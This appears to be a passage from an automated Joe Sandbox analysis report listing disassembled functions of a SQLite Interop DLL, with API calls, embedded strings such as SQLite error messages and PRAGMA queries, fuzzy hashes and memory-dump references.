                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset$_memmove
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 2532777613-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 4be8349b643116a185aab406ff758e935d5a1cd7b7fd0187728cea540a845092
                                                                                                                                                                                                                                      • Instruction ID: dde925cc7ae031419aeede601eebcbf85296147234546182cd195f0a3f674150
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4be8349b643116a185aab406ff758e935d5a1cd7b7fd0187728cea540a845092
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF1097150E7914BC311DF38D0907EBBBE0AF99318F440DAEE8D957242D628E749DBA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,00000000,?,6BCCF9DC,00000000,CryptAcquireContext failed, code=%lu,00000000), ref: 6BC01A5A
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,00000000,?,6BCCF9DC,00000000,CryptAcquireContext failed, code=%lu,00000000), ref: 6BC01A67
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ContextCryptIaa0f8e0c251cfd1d.Release
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3500827864-0
                                                                                                                                                                                                                                      • Opcode ID: da6591b05d1158e83dbc95b3894579c94a85d8f208d2cc3604f9ae9d777eb226
                                                                                                                                                                                                                                      • Instruction ID: 779af5f4f4d3b9398c92731910d4ec0bffcb62c895868f8e4661cccf7436894b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da6591b05d1158e83dbc95b3894579c94a85d8f208d2cc3604f9ae9d777eb226
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CE0C272A123349BEB205E58E800B46B3EC9F01B6CF000058F84997240EB7AF78096E5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD65DA
                                                                                                                                                                                                                                      • __mtterm.LIBCMT ref: 6BBD65E6
                                                                                                                                                                                                                                        • Part of subcall function 6BBD62B1: DecodePointer.KERNEL32(0000000D,6BBD32A5,6BBD328B,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD62C2
                                                                                                                                                                                                                                        • Part of subcall function 6BBD62B1: TlsFree.KERNEL32(00000026,6BBD32A5,6BBD328B,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD62DC
                                                                                                                                                                                                                                        • Part of subcall function 6BBD62B1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6BBD32A5,6BBD328B,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBDC08F
                                                                                                                                                                                                                                        • Part of subcall function 6BBD62B1: _free.LIBCMT ref: 6BBDC092
                                                                                                                                                                                                                                        • Part of subcall function 6BBD62B1: DeleteCriticalSection.KERNEL32(00000026,?,?,6BBD32A5,6BBD328B,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBDC0B9
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6BBD65FC
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6BBD6609
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6BBD6616
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6BBD6623
                                                                                                                                                                                                                                      • TlsAlloc.KERNEL32(?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD6673
                                                                                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD668E
                                                                                                                                                                                                                                      • __init_pointers.LIBCMT ref: 6BBD6698
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD66A9
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD66B6
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD66C3
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD66D0
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(Function_00006435,?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD66F1
                                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 6BBD6706
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD6720
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BBD6732
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                      • API String ID: 3698121176-3819984048
                                                                                                                                                                                                                                      • Opcode ID: d1e8c081db3daba13fa911a50fa6948fa79dd401e95395a97cce11392f31653c
                                                                                                                                                                                                                                      • Instruction ID: f2b74b6ec47d7ad08c519a3d9f426a7d917ef4ef0fd91cd8e6fd937799f6aaa8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1e8c081db3daba13fa911a50fa6948fa79dd401e95395a97cce11392f31653c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A319C31C00745AFFF15AF75D80EA49BAA9EF47620790026AF4169A291EB7CD103CF60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC43B00
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP ref: 6BC43B12
                                                                                                                                                                                                                                      • SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC43B65
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP ref: 6BC43B77
                                                                                                                                                                                                                                      • SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC43BC3
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP ref: 6BC43BD5
                                                                                                                                                                                                                                      • SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC43C30
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP ref: 6BC43C3E
                                                                                                                                                                                                                                      • SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC43C95
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP ref: 6BC43CA7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I5b4aedd0c04bd151.I5b914c29cf5a7984.
                                                                                                                                                                                                                                      • String ID: automerge$crisismerge$hashsize$pgsz$rank$usermerge
                                                                                                                                                                                                                                      • API String ID: 199341400-4069215817
                                                                                                                                                                                                                                      • Opcode ID: dbb91913b429234b639e0d971f2eff0d7848d679f53b2fc321aa8f20b9a6ed73
                                                                                                                                                                                                                                      • Instruction ID: 5b2978430f33aec3a1dc54ce0e0b05a34559f5003b936df52fa54434e00ae66c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbb91913b429234b639e0d971f2eff0d7848d679f53b2fc321aa8f20b9a6ed73
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10710671D241554BDB20CB78998066EBBB8EFC5219F1045EAEC89CB201FB3EDB508B91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(not authorized,?,?), ref: 6BC5D918
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(%s.%s,?,00000000), ref: 6BC5D97F
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC5D9A3
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(error during initialization: %s,?), ref: 6BC5DD08
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC5DD17
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC5DD65
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Idb45e174afb28e2c.$Iaa0f8e0c251cfd1d.$_memset
                                                                                                                                                                                                                                      • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$unable to open shared library [%.*s]
                                                                                                                                                                                                                                      • API String ID: 1491502024-2763346821
                                                                                                                                                                                                                                      • Opcode ID: b7a2745de88085a32ec87ec438f26c37606552840b8b18515b12311f4124343c
                                                                                                                                                                                                                                      • Instruction ID: d52a618f82473b7fcdebdd94e0d2a3a9f514b5a93d8d0687294f83004ecde327
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7a2745de88085a32ec87ec438f26c37606552840b8b18515b12311f4124343c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41E1D272A553019BD700CF68D881E5BB7E5EF89318F044569EC98DB301F738EA25CBA6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(PRAGMA '%q'.table_info('%q'),?,?,00000000,00000000,?,?,?,?,00000000,?,?), ref: 6BCCB734
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(SELECT 0, 'tbl', '', 0, '', 1 UNION ALL SELECT 1, 'idx', '', 0, '', 2 UNION ALL SELECT 2, 'stat', '', 0, '', 0,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,?,?), ref: 6BCCB7BC
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(6BD06F50,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,?,?), ref: 6BCCB7EC
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,?), ref: 6BCCB84B
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000), ref: 6BCCB895
                                                                                                                                                                                                                                      • SI25ca8d2baaee0750.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 6BCCB8A5
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,?,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 6BCCB8B3
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6BCCB970
                                                                                                                                                                                                                                      • SI25ca8d2baaee0750.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BCCB989
                                                                                                                                                                                                                                      • SI1bfe410acac3c9be.SQLITE.INTEROP(?,00000005), ref: 6BCCB9B9
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,?,00000005), ref: 6BCCB9CC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • PRAGMA '%q'.table_info('%q'), xrefs: 6BCCB72F
                                                                                                                                                                                                                                      • SELECT 0, 'tbl', '', 0, '', 1 UNION ALL SELECT 1, 'idx', '', 0, '', 2 UNION ALL SELECT 2, 'stat', '', 0, '', 0, xrefs: 6BCCB7B7
                                                                                                                                                                                                                                      • sqlite_stat1, xrefs: 6BCCB786
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Ia364946505687432.$Idb45e174afb28e2c.$I25ca8d2baaee0750.$I1bfe410acac3c9be.Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID: PRAGMA '%q'.table_info('%q')$SELECT 0, 'tbl', '', 0, '', 1 UNION ALL SELECT 1, 'idx', '', 0, '', 2 UNION ALL SELECT 2, 'stat', '', 0, '', 0$sqlite_stat1
                                                                                                                                                                                                                                      • API String ID: 1143027874-3059532742
                                                                                                                                                                                                                                      • Opcode ID: 5f8cb0417928365ddfe4189f760046dd55bfa476dd05fcf9ba3872952c6b763b
                                                                                                                                                                                                                                      • Instruction ID: 76f68aba2ee3fed1cfb4f8fd034c49942277fbcb40c5cacc09d72fdc880c4dc2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f8cb0417928365ddfe4189f760046dd55bfa476dd05fcf9ba3872952c6b763b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57A1C1B5E102099BDB00CF64DC81AAF77B9EF95318F1441A5EC15AB341F739EA11CBA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIc14fb8a21feb2e94.SQLITE.INTEROP(?,SAVEPOINT changeset,00000000,00000000,00000000), ref: 6BCD2898
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCD28CD
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCD2A68
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.Ia364946505687432.Ic14fb8a21feb2e94.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$RELEASE changeset$SAVEPOINT changeset$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2646806474-2422101649
                                                                                                                                                                                                                                      • Opcode ID: 763de904165c620f598db56ac98f75b5893fce9ccb5c9ee5121feeb3c52c7630
                                                                                                                                                                                                                                      • Instruction ID: bd5708f5040998a80d219ec3daf78b31a761274147e06d212ec2e29e98e61452
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 763de904165c620f598db56ac98f75b5893fce9ccb5c9ee5121feeb3c52c7630
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AD19DB5A18341ABC710CF28C89191BB7F5BFC8714F044A5DFA959B301E779EA05CBA2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld
                                                                                                                                                                                                                                      • API String ID: 0-866662573
                                                                                                                                                                                                                                      • Opcode ID: de9a701766c8bf98022ce6478e8fff5eba4a6e76eb1a47393e15515382301c3c
                                                                                                                                                                                                                                      • Instruction ID: db2d7196775dc23ed34dc1c97d5584e9b56d843b52176e3a0e4949fec9854b2f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de9a701766c8bf98022ce6478e8fff5eba4a6e76eb1a47393e15515382301c3c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEB1F472A183409BD7148BB8CC41B5FB7B8FBC2744F40491DF68597251E779EB488B92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI5b4aedd0c04bd151.SQLITE.INTEROP(?), ref: 6BC3E2A3
                                                                                                                                                                                                                                      • SI905dcc543d48caab.SQLITE.INTEROP(?,1st argument to percentile() is not numeric,000000FF), ref: 6BC3E377
                                                                                                                                                                                                                                      • SI905dcc543d48caab.SQLITE.INTEROP(?,2nd argument to percentile() is not the same for all input rows,000000FF), ref: 6BC3E3B6
                                                                                                                                                                                                                                      • SI94ecb64e9dbb8338.SQLITE.INTEROP ref: 6BC3E3C6
                                                                                                                                                                                                                                      • SI905dcc543d48caab.SQLITE.INTEROP(?,Inf input to percentile(),000000FF), ref: 6BC3E3E9
                                                                                                                                                                                                                                      • SIf0a08171cb5be57f.SQLITE.INTEROP(?,00000000,00000000), ref: 6BC3E416
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC3E426
                                                                                                                                                                                                                                      • SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC3E445
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Inf input to percentile(), xrefs: 6BC3E3E3
                                                                                                                                                                                                                                      • 2nd argument to percentile() is not the same for all input rows, xrefs: 6BC3E3B0
                                                                                                                                                                                                                                      • 2nd argument to percentile() is not a number between 0.0 and 100.0, xrefs: 6BC3E486
                                                                                                                                                                                                                                      • 1st argument to percentile() is not numeric, xrefs: 6BC3E371
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I905dcc543d48caab.$I1bf8975e567ea97a.I5b4aedd0c04bd151.I94ecb64e9dbb8338.Iaa0f8e0c251cfd1d.If0a08171cb5be57f.
                                                                                                                                                                                                                                      • String ID: 1st argument to percentile() is not numeric$2nd argument to percentile() is not a number between 0.0 and 100.0$2nd argument to percentile() is not the same for all input rows$Inf input to percentile()
                                                                                                                                                                                                                                      • API String ID: 908108584-2567114664
                                                                                                                                                                                                                                      • Opcode ID: be5f65a7d3081d467adead9e6d6777c32b6a1c30ee357da26d34bc4b49d6f1a6
                                                                                                                                                                                                                                      • Instruction ID: f5ad041253416a84fa3a02d767aaa38aa201b1e815ac6b738363ffe2cec735b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be5f65a7d3081d467adead9e6d6777c32b6a1c30ee357da26d34bc4b49d6f1a6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D519EB1A2011797C7009F29E840755B7A4FF89365FA007A5F86C83290FB3ADA61C7E1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(invalid ICLRRuntimeHost pointer.,00000000,?), ref: 6BBF8878
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BBF888D
                                                                                                                                                                                                                                      • __snprintf.LIBCMT ref: 6BBF88A9
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 6BBF88B8
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(invalid ICLRRuntimeHost.,00000000,?), ref: 6BBF88DD
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(done with cleanup.), ref: 6BBF88F5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
